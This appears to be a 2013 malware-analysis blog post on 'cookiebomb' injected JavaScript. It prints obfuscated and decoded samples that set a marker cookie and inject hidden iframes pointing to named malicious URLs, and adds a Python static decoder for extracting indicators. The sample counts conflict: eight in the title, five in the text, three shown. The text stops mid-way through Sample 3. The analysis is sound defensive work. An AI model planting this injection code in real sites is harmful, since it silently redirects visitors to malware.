Monday, September 23, 2013

8 samples of cookie-based web malware


Obfuscated JavaScript injects a hidden malicious iframe into a web page, with the browser's cookies deciding whether the injection fires

Background

Online Website Malware Scanner has detected malicious JavaScript injected into pages of several websites. The decoded payload uses a browser cookie as the trigger for the malicious redirect: the script looks for a marker cookie, and if it is absent it creates the cookie and then injects the iframe. On later visits the cookie is present and the script does nothing, so the injection fires at most once per visitor within the cookie's lifetime. That is what makes it hard to reproduce: a researcher, a site owner or a scanner that revisits the page with the same browser profile sees a clean page, while every first-time visitor is still redirected. This technique was described on the malwaremustdie blog, whose author gave it, in my opinion, a very fitting name: the "cookiebomb attack". You can review previous analyses of similar attacks in our other posts describing malware that involves web cookies.

Malicious action

Hidden iframes like these are a standard way to load content from an external website, in this case a page that serves malware, into the visitor's browser without anything visible on the compromised page.

Sample 1 

Beautified script

try {
    // pkiju is never defined, so this always throws a ReferenceError and
    // control lands in the catch block, which is where the decoder is defined
    + function () {
        if (document.querySelector)--(window[pkiju].getElementById("asd"))
    }()
} catch (lghy) {
    esujkx = function (vhkw) {
        vhkw = "fro" + vhkw;                                   // "fromCharCode"
        for (xbh = 0; xbh < cuvcj.length; xbh++) {
            // each token is parsed as hex via eval("0x..") and shifted by -120
            xdl += String[vhkw](ndh(ljp + (cuvcj[xbh])) - (120));
        }
    };
};
ndh = (window.eval);
ljp = "0x";
ugg = 0;
if (!ugg) {
    try {
        ++ndh(pkiju)["\x62o" + "d" + cuvcj]                    // eval of an undefined name throws
    } catch (lghy) {
        qvqzj = "^";                                           // token delimiter
    }
    cuvcj = "98^de^ed^e6^db^ec^e1^e7^e6^98^df^ed^e9^a8^b1^a0^a1^98^f3^85^82^98^ee^d9^ea^98^eb^ec^d9^ec^e1^db^b5^9f^d9^e2^d9^f0^9f^b3^85^82^98^ee^d9^ea^98^db^e7^e6^ec^ea^e7^e4^e4^dd^ea^b5^9f^e1^e6^dc^dd^f0^a6^e8^e0^e8^9f^b3^85^82^98^ee^d9^ea^98^df^ed^e9^98^b5^98^dc^e7^db^ed^e5^dd^e6^ec^a6^db^ea^dd^d9^ec^dd^bd^e4^dd^e5^dd^e6^ec^a0^9f^e1^de^ea^d9^e5^dd^9f^a1^b3^85^82^85^82^98^df^ed^e9^a6^eb^ea^db^98^b5^98^9f^e0^ec^ec^e8^b2^a7^a7^da^ea^eb^db^dd^ea^ec^e1^de^e1^db^d9^ec^e1^e7^e6^a6^e1^ea^a7^e8^ea^e7^e5^e7^aa^a7^c4^e6^ea^b1^aa^af^c9^ee^a6^e8^e0^e8^9f^b3^85^82^98^df^ed^e9^a6^eb^ec^f1^e4^dd^a6^e8^e7^eb^e1^ec^e1^e7^e6^98^b5^98^9f^d9^da^eb^e7^e4^ed^ec^dd^9f^b3^85^82^98^df^ed^e9^a6^eb^ec^f1^e4^dd^a6^db^e7^e4^e7^ea^98^b5^98^9f^a9^9f^b3^85^82^98^df^ed^e9^a6^eb^ec^f1^e4^dd^a6^e0^dd^e1^df^e0^ec^98^b5^98^9f^a9^e8^f0^9f^b3^85^82^98^df^ed^e9^a6^eb^ec^f1^e4^dd^a6^ef^e1^dc^ec^e0^98^b5^98^9f^a9^e8^f0^9f^b3^85^82^98^df^ed^e9^a6^eb^ec^f1^e4^dd^a6^e4^dd^de^ec^98^b5^98^9f^a9^a8^a8^a8^a9^9f^b3^85^82^98^df^ed^e9^a6^eb^ec^f1^e4^dd^a6^ec^e7^e8^98^b5^98^9f^a9^a8^a8^a8^a9^9f^b3^85^82^85^82^98^e1^de^98^a0^99^dc^e7^db^ed^e5^dd^e6^ec^a6^df^dd^ec^bd^e4^dd^e5^dd^e6^ec^ba^f1^c1^dc^a0^9f^df^ed^e9^9f^a1^a1^98^f3^85^82^98^dc^e7^db^ed^e5^dd^e6^ec^a6^ef^ea^e1^ec^dd^a0^9f^b4^e8^98^e1^dc^b5^d4^9f^df^ed^e9^d4^9f^98^db^e4^d9^eb^eb^b5^d4^9f^df^ed^e9^a8^b1^d4^9f^98^b6^b4^a7^e8^b6^9f^a1^b3^85^82^98^dc^e7^db^ed^e5^dd^e6^ec^a6^df^dd^ec^bd^e4^dd^e5^dd^e6^ec^ba^f1^c1^dc^a0^9f^df^ed^e9^9f^a1^a6^d9^e8^e8^dd^e6^dc^bb^e0^e1^e4^dc^a0^df^ed^e9^a1^b3^85^82^98^f5^85^82^f5^85^82^de^ed^e6^db^ec^e1^e7^e6^98^cb^dd^ec^bb^e7^e7^e3^e1^dd^a0^db^e7^e7^e3^e1^dd^c6^d9^e5^dd^a4^db^e7^e7^e3^e1^dd^ce^d9^e4^ed^dd^a4^e6^bc^d9^f1^eb^a4^e8^d9^ec^e0^a1^98^f3^85^82^98^ee^d9^ea^98^ec^e7^dc^d9^f1^98^b5^98^e6^dd^ef^98^bc^d9^ec^dd^a0^a1^b3^85^82^98^ee^d9^ea^98^dd^f0^e8^e1^ea^dd^98^b5^98^e6^dd^ef^98^bc^d9^ec^dd^a0^a1^b3^85^82^98^e1^de^98^a0^e6^bc^d9^f1^eb^b5^b5^e6^ed^e4^e4^98^f4^f4^98^e6^bc^d9^f1^eb^b5^b5^a8^a1^98^e6^bc^d9^f1^eb^b5^a9^b3^85^82^98^dd^f0^e8^e1^ea^dd^a6^eb^dd^ec^cc^e1^e5^dd^a0^ec^e7^dc^d9^f1^a6^df^dd^ec^cc^e1^e5^dd^a0^a1^98^a3^98^ab^ae^a8^a8^a8^a8^a8^a2^aa^ac^a2^e6^bc^d9^f1^eb^a1^b3^85^82^98^dc^e7^db^ed^e5^dd^e6^ec^a6^db^e7^e7^e3^e1^dd^98^b5^98^db^e7^e7^e3^e1^dd^c6^d9^e5^dd^a3^9a^b5^9a^a3^dd^eb^db^d9^e8^dd^a0^db^e7^e7^e3^e1^dd^ce^d9^e4^ed^dd^a1^85^82^98^a3^98^9a^b3^dd^f0^e8^e1^ea^dd^eb^b5^9a^98^a3^98^dd^f0^e8^e1^ea^dd^a6^ec^e7^bf^c5^cc^cb^ec^ea^e1^e6^df^a0^a1^98^a3^98^a0^a0^e8^d9^ec^e0^a1^98^b7^98^9a^b3^98^e8^d9^ec^e0^b5^9a^98^a3^98^e8^d9^ec^e0^98^b2^98^9a^9a^a1^b3^85^82^f5^85^82^de^ed^e6^db^ec^e1^e7^e6^98^bf^dd^ec^bb^e7^e7^e3^e1^dd^a0^98^e6^d9^e5^dd^98^a1^98^f3^85^82^98^ee^d9^ea^98^eb^ec^d9^ea^ec^98^b5^98^dc^e7^db^ed^e5^dd^e6^ec^a6^db^e7^e7^e3^e1^dd^a6^e1^e6^dc^dd^f0^c7^de^a0^98^e6^d9^e5^dd^98^a3^98^9a^b5^9a^98^a1^b3^85^82^98^ee^d9^ea^98^e4^dd^e6^98^b5^98^eb^ec^d9^ea^ec^98^a3^98^e6^d9^e5^dd^a6^e4^dd^e6^df^ec^e0^98^a3^98^a9^b3^85^82^98^e1^de^98^a0^98^a0^98^99^eb^ec^d9^ea^ec^98^a1^98^9e^9e^85^82^98^a0^98^e6^d9^e5^dd^98^99^b5^98^dc^e7^db^ed^e5^dd^e6^ec^a6^db^e7^e7^e3^e1^dd^a6^eb^ed^da^eb^ec^ea^e1^e6^df^a0^98^a8^a4^98^e6^d9^e5^dd^a6^e4^dd^e6^df^ec^e0^98^a1^98^a1^98^a1^85^82^98^f3^85^82^98^ea^dd^ec^ed^ea^e6^98^e6^ed^e4^e4^b3^85^82^98^f5^85^82^98^e1^de^98^a0^98^eb^ec^d9^ea^ec^98^b5^b5^98^a5^a9^98^a1^98^ea^dd^ec^ed^ea^e6^98^e6^ed^e4^e4^b3^85^82^98^ee^d9^ea^98^dd^e6^dc^98^b5^98^dc^e7^db^ed^e5^dd^e6^ec^a6^db^e7^e7^e3^e1^dd^a6^e1^e6^dc^dd^f0^c7^de^a0^98^9a^b3^9a^a4^98^e4^dd^e6^98^a1^b3^85^82^98^e1^de^98^a0^98^dd^e6^dc^98^b5^b5^98^a5^a9^98^a1^98^dd^e6^dc^98^b5^98^dc^e7^db^ed^e5^dd^e6^ec^a6^db^e7^e7^e3^e1^dd^a6^e4^dd^e6^df^ec^e0^b3^85^82^98^ea^dd^ec^ed^ea^e6^98^ed^e6^dd^eb^db^d9^e8^dd^a0^98^dc^e7^db^ed^e5^dd^e6^ec^a6^db^e7^e7^e3^e1^dd^a6^eb^ed^da^eb^ec^ea^e1^e6^df^a0^98^e4^dd^e6^a4^98^dd^e6^dc^98^a1^98^a1^b3^85^82^f5^85^82^e1^de^98^a0^e6^d9^ee^e1^df^d9^ec^e7^ea^a6^db^e7^e7^e3^e1^dd^bd^e6^d9^da^e4^dd^dc^a1^85^82^f3^85^82^e1^de^a0^bf^dd^ec^bb^e7^e7^e3^e1^dd^a0^9f^ee^e1^eb^e1^ec^dd^dc^d7^ed^e9^9f^a1^b5^b5^ad^ad^a1^f3^f5^dd^e4^eb^dd^f3^cb^dd^ec^bb^e7^e7^e3^e1^dd^a0^9f^ee^e1^eb^e1^ec^dd^dc^d7^ed^e9^9f^a4^98^9f^ad^ad^9f^a4^98^9f^a9^9f^a4^98^9f^a7^9f^a1^b3^85^82^85^82^df^ed^e9^a8^b1^a0^a1^b3^85^82^f5^85^82^f5".split(qvqzj);
    xdl = "";
    esujkx("mCharCode");
    ndh("" + xdl);                                             // eval of the decoded payload
}

Malicious payload


The decoded payload checks for a cookie named visited_uq. If it is absent, the script first sets visited_uq=55 with a one-day expiry and only then calls guq09(), which appends a 1px by 1px iframe pointing to http://brscertification.ir/promo2/Lnr927Qv.php. Because the cookie is written before the frame is created, the same browser profile is not redirected again for 24 hours, even if the first load of the external page failed. Two details worth noting: the string '55' read back from the cookie compares equal to the number 55 under JavaScript's loose equality, and the unitless left and top values ('10001') are invalid CSS that standards-mode browsers ignore, so here the frame is hidden by its size rather than by its position. All samples on this page use the same cookie name and value, so a visited_uq=55 cookie in a browser profile is a good indicator that the profile has already been served one of these injections, and it has to be cleared (or a fresh profile used) before the redirect can be reproduced.


function guq09() {
    var static = 'ajax';                 // unused decoys
    var controller = 'index.php';
    var guq = document.createElement('iframe');
    guq.src = 'http://brscertification.ir/promo2/Lnr927Qv.php';
    guq.style.position = 'absolute';
    guq.style.color = '1';
    guq.style.height = '1px';
    guq.style.width = '1px';
    guq.style.left = '10001';            // unitless: dropped as invalid in standards mode
    guq.style.top = '10001';
    if (!document.getElementById('guq')) {
        document.write('<p id=\'guq\' class=\'guq09\' ></p>');
        document.getElementById('guq').appendChild(guq);
    }
}

function SetCookie(cookieName, cookieValue, nDays, path) {
    var today = new Date();
    var expire = new Date();
    if (nDays == null || nDays == 0) nDays = 1;
    expire.setTime(today.getTime() + 3600000 * 24 * nDays);     // nDays * 24 hours
    document.cookie = cookieName + "=" + escape(cookieValue)
        + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie(name) {
    var start = document.cookie.indexOf(name + "=");
    var len = start + name.length + 1;
    if ((!start) && (name != document.cookie.substring(0, name.length))) {
        return null;
    }
    if (start == -1) return null;
    var end = document.cookie.indexOf(";", len);
    if (end == -1) end = document.cookie.length;
    return unescape(document.cookie.substring(len, end));
}

if (navigator.cookieEnabled) {
    // '55' read back from the cookie == 55 under loose equality
    if (GetCookie('visited_uq') == 55) {} else {
        SetCookie('visited_uq', '55', '1', '/');   // cookie is set before the iframe is injected
        guq09();
    }
}
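All five samples on this page share one encoding: the payload is stored as hex tokens separated by a single delimiter character ('^' in Sample 1, ',' or ':' in the others), and every token is shifted by a constant (-120, +9 or -7) before String.fromCharCode. The script below is an added example written for this post, not code from the page or from the malware author. It locates such a string literal in a script, recovers the delimiter and the shift without executing anything (first from the ' function' prefix every payload here starts with, then by brute force if that fails), decodes the blob, and pulls out the iframe URL and the gate cookie. The three *_HEAD strings are copied from the start of the obfuscated strings on this page; the longer injected-script input is constructed here by re-encoding two lines of Sample 1's decoded payload with the same '^'/-120 scheme, and the 40-token minimum in BLOB_RE is an arbitrary threshold chosen to skip short legitimate strings.

```python
"""Static decoder for the cookiebomb samples on this page.  This is an added example
written for this post, not code from the page or from the malware author; it never
calls eval() and runs offline on the embedded data."""
import re
import string
from typing import Iterator, Optional, Tuple

JS_MARKERS = ("function", "document", "cookie", "iframe")

# Leading tokens copied from the obfuscated strings quoted on this page.
SAMPLE1_HEAD = "98^de^ed^e6^db^ec^e1^e7^e6^98^df^ed^e9^a8^b1^a0^a1^98^f3"     # '^', -120
SAMPLE2_HEAD = "17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72"   # ',', +9
SAMPLE4_HEAD = "27,6d,7c,75,6a,7b,70,76,75,27,77,7c,80,37,40,2f,30,27,82"     # ',', -7

# A double-quoted run of 40+ one- or two-digit hex tokens joined by one delimiter.
BLOB_RE = re.compile(r'"([0-9a-fA-F]{1,2}([,:^])(?:[0-9a-fA-F]{1,2}\2){39,}[0-9a-fA-F]{1,2})"')


def find_blobs(script: str) -> Iterator[Tuple[str, str]]:
    """Yield (blob, delimiter) for every obfuscated string literal in a script."""
    for m in BLOB_RE.finditer(script):
        yield m.group(1), m.group(2)


def decode_tokens(blob: str, delimiter: str, offset: int) -> str:
    """String.fromCharCode(parseInt(tok, 16) + offset) for every token, done statically."""
    codes = [int(tok, 16) + offset for tok in blob.split(delimiter) if tok]
    if any(not 0 <= c <= 0x10FFFF for c in codes):
        raise ValueError("offset pushes a code point out of range")
    return "".join(map(chr, codes))


def offset_from_prefix(blob: str, delimiter: str, known_prefix: str = " function") -> Optional[int]:
    """Every payload on this page starts with ' function': the first token fixes the
    offset and the rest of the prefix confirms it.  Returns None if it does not fit."""
    toks = [int(t, 16) for t in blob.split(delimiter)[:len(known_prefix)]]
    if len(toks) < len(known_prefix):
        return None
    offset = ord(known_prefix[0]) - toks[0]
    fits = all(t + offset == ord(ch) for t, ch in zip(toks, known_prefix))
    return offset if fits else None


def offset_by_bruteforce(blob: str, delimiter: str, span: int = 255) -> int:
    """Fallback for an unknown prefix: try every additive offset, prefer the output
    with the most JavaScript keywords, then the most printable characters."""
    best, best_score = 0, (-1, -1)
    for offset in range(-span, span + 1):
        try:
            text = decode_tokens(blob, delimiter, offset)
        except ValueError:
            continue
        score = (sum(text.count(k) for k in JS_MARKERS),
                 sum(ch in string.printable for ch in text))
        if score > best_score:
            best, best_score = offset, score
    return best


def decode_blob(blob: str, delimiter: str) -> Tuple[int, str]:
    """Recover the offset (known prefix first, brute force second) and decode."""
    offset = offset_from_prefix(blob, delimiter)
    if offset is None:
        offset = offset_by_bruteforce(blob, delimiter)
    return offset, decode_tokens(blob, delimiter, offset)


IFRAME_SRC = re.compile(r"\.src\s*=\s*'([^']+)'")
COOKIE_GATE = re.compile(r"GetCookie\('([^']+)'\)\s*==\s*(\w+)")


def extract_iocs(payload: str) -> dict:
    """The iframe landing URL plus the name and expected value of the gate cookie."""
    src = IFRAME_SRC.search(payload)
    gate = COOKIE_GATE.search(payload)
    return {"iframe_src": src.group(1) if src else None,
            "cookie_name": gate.group(1) if gate else None,
            "cookie_value": gate.group(2) if gate else None}


def analyse(script: str) -> list:
    """Whole pipeline over one script: locate blobs, decode each, collect IOCs."""
    results = []
    for blob, delimiter in find_blobs(script):
        offset, payload = decode_blob(blob, delimiter)
        results.append({"delimiter": delimiter, "offset": offset, **extract_iocs(payload)})
    return results


def encode_tokens(text: str, delimiter: str, offset: int) -> str:
    """Inverse of decode_tokens; only used to build the constructed input below."""
    return delimiter.join(format(ord(ch) - offset, "x") for ch in text)


# Constructed input: the IOC-bearing lines of Sample 1's decoded payload, re-encoded
# with the same '^' delimiter and -120 shift the real Sample 1 uses.
SAMPLE1_PLAINTEXT = (
    " function guq09() { var guq = document.createElement('iframe');"
    " guq.src = 'http://brscertification.ir/promo2/Lnr927Qv.php'; }"
    " if (GetCookie('visited_uq') == 55) {} else { SetCookie('visited_uq', '55', '1', '/'); guq09(); }"
)
INJECTED_SCRIPT = ('try { ++ndh(pkiju) } catch (lghy) { cuvcj = "'
                   + encode_tokens(SAMPLE1_PLAINTEXT, "^", -120) + '".split("^"); }')

if __name__ == "__main__":
    print(analyse(INJECTED_SCRIPT))
```

To use it on a real case, pass the contents of a saved copy of the injected page to analyse(). The prefix method is the one to rely on for this family; the brute-force path costs 511 decode attempts per blob and is only there for a variant whose payload does not open with ' function'.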


Sample 2 

Beautified script 

aq = "0" + "x";
bv = (5 - 3 - 1);                        // 1
sp = "s" + "pli" + "t";
w = window;                              // name lost in extraction, restored from w["eval"] below
dy = "dy";                               // name lost in extraction (assumed here); the value is never used
try {
    // assigning NaN to document.body throws in a real browser; in an emulator where
    // document.body is a plain object it does not, and nothing below runs
    ++document.body
} catch (d21vd12v) {
    vzs = false;
    try {} catch (wb) {
        vzs = 21;                        // an empty try never throws, so vzs stays false
    }
    if (!vzs) e = w["eval"];
    if (1) {
        f = "17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,65,70,5e,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,65,70,5e,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6d,60,6a,5a,66,63,25,5a,66,64,25,6b,69,26,6e,67,24,5a,66,65,6b,5c,65,6b,26,67,63,6c,5e,60,65,6a,26,5a,6c,6a,6b,66,64,60,71,5c,24,58,5b,64,60,65,26,51,6e,5a,3b,29,4a,6a,3c,25,67,5f,67,1e,32,4,1,17,65,70,5e,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,17,34,17,1e,58,59,6a,66,63,6c,6b,5c,1e,32,4,1,17,65,70,5e,25,6a,6b,70,63,5c,25,59,66,69,5b,5c,69,17,34,17,1e,27,1e,32,4,1,17,65,70,5e,25,6a,6b,70,63,5c,25,5f,5c,60,5e,5f,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,65,70,5e,25,6a,6b,70,63,5c,25,6e,60,5b,6b,5f,17,34,17,1e,28,67,6f,1e,32,4,1,17,65,70,5e,25,6a,6b,70,63,5c,25,63,5c,5d,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,65,70,5e,25,6a,6b,70,63,5c,25,6b,66,67,17,34,17,1e,28,67,6f,1e,32,4,1,4,1,17,60,5d,17,1f,18,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,65,70,5e,1e,20,20,17,72,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,1e,33,5b,60,6d,17,60,5b,34,53,1e,65,70,5e,53,1e,35,33,26,5b,60,6d,35,1e,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,65,70,5e,1e,20,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,65,70,5e,20,32,4,1,17,74,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,4a,5c,6b,3a,66,66,62,60,5c,1f,5a,66,66,62,60,5c,45,58,64,5c,23,5a,66,66,62,60,5c,4d,58,63,6c,5c,23,65,3b,58,70,6a,23,67,58,6b,5f,20,17,72,4,1,17,6d,58,69,17,6b,66,5b,58,70,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,6d,58,69,17,5c,6f,67,60,69,5c,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,60,5d,17,1f,65,3b,58,70,6a,34,34,65,6c,63,63,17,73,73,17,65,3b,58,70,6a,34,34,27,20,17,65,3b,58,70,6a,34,28,32,4,1,17,5c,6f,67,60,69,5c,25,6a,5c,6b,4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c,1f,20,17,22,17,2a,2d,27,27,27,27,27,21,29,2b,21,65,3b,58,70,6a,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,17,34,17,5a,66,66,62,60,5c,45,58,64,5c,22,19,34,19,22,5c,6a,5a,58,67,5c,1f,5a,66,66,62,60,5c,4d,58,63,6c,5c,20,4,1,17,22,17,19,32,5c,6f,67,60,69,5c,6a,34,19,17,22,17,5c,6f,67,60,69,5c,25,6b,66,3e,44,4b,4a,6b,69,60,65,5e,1f,20,17,22,17,1f,1f,67,58,6b,5f,20,17,36,17,19,32,17,67,58,6b,5f,34,19,17,22,17,67,58,6b,5f,17,31,17,19,19,20,32,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,3e,5c,6b,3a,66,66,62,60,5c,1f,17,65,58,64,5c,17,20,17,72,4,1,17,6d,58,69,17,6a,6b,58,69,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,65,58,64,5c,17,22,17,19,34,19,17,20,32,4,1,17,6d,58,69,17,63,5c,65,17,34,17,6a,6b,58,69,6b,17,22,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,22,17,28,32,4,1,17,60,5d,17,1f,17,1f,17,18,6a,6b,58,69,6b,17,20,17,1d,1d,4,1,17,1f,17,65,58,64,5c,17,18,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,27,23,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,20,17,20,17,20,4,1,17,72,4,1,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,74,4,1,17,60,5d,17,1f,17,6a,6b,58,69,6b,17,34,34,17,24,28,17,20,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,6d,58,69,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,19,32,19,23,17,63,5c,65,17,20,32,4,1,17,60,5d,17,1f,17,5c,65,5b,17,34,34,17,24,28,17,20,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,63,5c,65,5e,6b,5f,32,4,1,17,69,5c,6b,6c,69,65,17,6c,65,5c,6a,5a,58,67,5c,1f,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,63,5c,65,23,17,5c,65,5b,17,20,17,20,32,4,1,74,4,1,60,5d,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"[sp](",");
    }
    w = f;
    s = [];
    for (i = 20 - 20; - i + 1354 != 0; i += 1) {     // loop variable name lost in extraction; 1354 tokens
        j = i;
        if ((0x19 == 031))                           // 25 == 25, always true; the octal literal is a SyntaxError under "use strict"
            if (e) s += String["fromCharCode"](e(aq + w[j]) + 0xa - bv);   // hex token + 9
    }
    za = e;
    za(s)                                            // eval of the decoded payload
}


Malicious payload

The decoded payload is the same cookie gate with a different landing page: if the visited_uq cookie is absent, it is set for one day and zzzfff() appends a borderless 1px by 1px iframe pointing to http://viscol.com.tr/wp-content/plugins/customize-admin/ZwcD2SsE.php, a PHP file sitting inside a WordPress plugin directory. This variant gives left and top a px unit, so the frame is both tiny and tucked into the page corner.

function zzzfff() {
    var nyg = document.createElement('iframe');
    nyg.src = 'http://viscol.com.tr/wp-content/plugins/customize-admin/ZwcD2SsE.php';
    nyg.style.position = 'absolute';
    nyg.style.border = '0';
    nyg.style.height = '1px';
    nyg.style.width = '1px';
    nyg.style.left = '1px';
    nyg.style.top = '1px';
    if (!document.getElementById('nyg')) {
        document.write('<div id=\'nyg\'></div>');
        document.getElementById('nyg').appendChild(nyg);
    }
}

function SetCookie(cookieName, cookieValue, nDays, path) {
    var today = new Date();
    var expire = new Date();
    if (nDays == null || nDays == 0) nDays = 1;
    expire.setTime(today.getTime() + 3600000 * 24 * nDays);     // nDays * 24 hours
    document.cookie = cookieName + "=" + escape(cookieValue)
        + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie(name) {
    var start = document.cookie.indexOf(name + "=");
    var len = start + name.length + 1;
    if ((!start) && (name != document.cookie.substring(0, name.length))) {
        return null;
    }
    if (start == -1) return null;
    var end = document.cookie.indexOf(";", len);
    if (end == -1) end = document.cookie.length;
    return unescape(document.cookie.substring(len, end));
}

if (navigator.cookieEnabled) {
    if (GetCookie('visited_uq') == 55) {} else {
        SetCookie('visited_uq', '55', '1', '/');   // cookie is set before the iframe is injected
        zzzfff();
    }
}


Sample 3 

Beautified script 

omb = "s" + "p" + "l" + "i" + "t";
rzeyu = window;
vknbp = document;
wokv = "0" + "x";
lvq = (5 - 3 - 1);                       // 1
try {
    // assigning NaN to document.body throws in a real browser; in an emulator where
    // document.body is a plain object it does not, and nothing below runs
    ++(vknbp.body)
} catch (uxrgp) {
    booy = false;
    try {} catch (woxivk) {
        booy = 21;                       // an empty try never throws, so booy stays false
    }
    if (1) {
        vgdck = "17:5d:6c:65:5a:6b:60:66:65:17:6f:66:59:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:66:59:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6f:66:59:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:59:5c:5a:58:6b:6b:60:65:60:67:60:58:65:6b:5c:25:60:6b:26:3e:69:58:5d:60:5a:58:26:5a:63:60:62:25:67:5f:67:1e:32:4:1:17:6f:66:59:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:6f:66:59:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:2b:29:28:2a:30:1e:32:4:1:17:6f:66:59:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:2b:29:28:2a:30:67:6f:1e:32:4:1:17:6f:66:59:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:2b:29:28:2a:30:67:6f:1e:32:4:1:17:6f:66:59:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:2b:29:28:2a:30:1e:32:4:1:17:6f:66:59:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:2b:29:28:2a:30:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:6f:66:59:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:6f:66:59:53:1e:17:5a:63:58:6a:6a:34:53:1e:6f:66:59:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:6f:66:59:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:6f:66:59:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:6